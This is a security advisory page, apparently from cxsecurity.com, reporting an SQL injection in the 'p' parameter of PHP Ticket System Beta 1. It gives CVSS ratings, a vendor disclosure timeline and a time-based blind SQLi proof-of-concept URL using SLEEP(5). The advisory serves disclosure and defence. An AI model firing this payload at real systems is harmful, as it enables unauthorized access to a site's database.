PHP Ticket System Beta 1 SQL Injection

2012-04-25 / 2013-01-25
Credit: G13
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


Ogólna skala CVSS: 7.5/10
Znaczenie: 6.4/10
Łatwość wykorzystania: 10/10
Wymagany dostęp: Zdalny
Złożoność ataku: Niska
Autoryzacja: Nie wymagana
Wpływ na poufność: Częściowy
Wpływ na integralność: Częściowy
Wpływ na dostępność: Częściowy

# Exploit Title: PHP Ticket System Beta 1 'p' SQL Injection # Date: 04/16/12 # Author: G13 # Twitter: @g13net # Software Site: http://sourceforge.net/projects/phpticketsystem/ # Version: Beta 1 # Category: webapp (php) # ##### Description ##### PHP Ticket System is a small PHP MySQL trouble ticket or work ordersystem that is a work in progress. ##### Vulnerability ##### The 'p' parameter on index.php is vulnerable to SQL Injection. A user must be signed in to perform this attack. ##### Exploit ##### http://localhost/index.php?p=[SQLi]&id=211&_=1334627588812 ##### PoC ##### http://localhost/index.php?p=edit_ticket' AND SLEEP(5) AND 'yoUg'='yoUg&id=211&_=1334627588812 ##### Vendor Notification ##### 4/16/12 - Vendor Notified 4/17/12 - Vendor reponse, will be fixed in next release 4/24/12 - Disclosure

Referencje:

http://sourceforge.net/projects/phpticketsystem/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top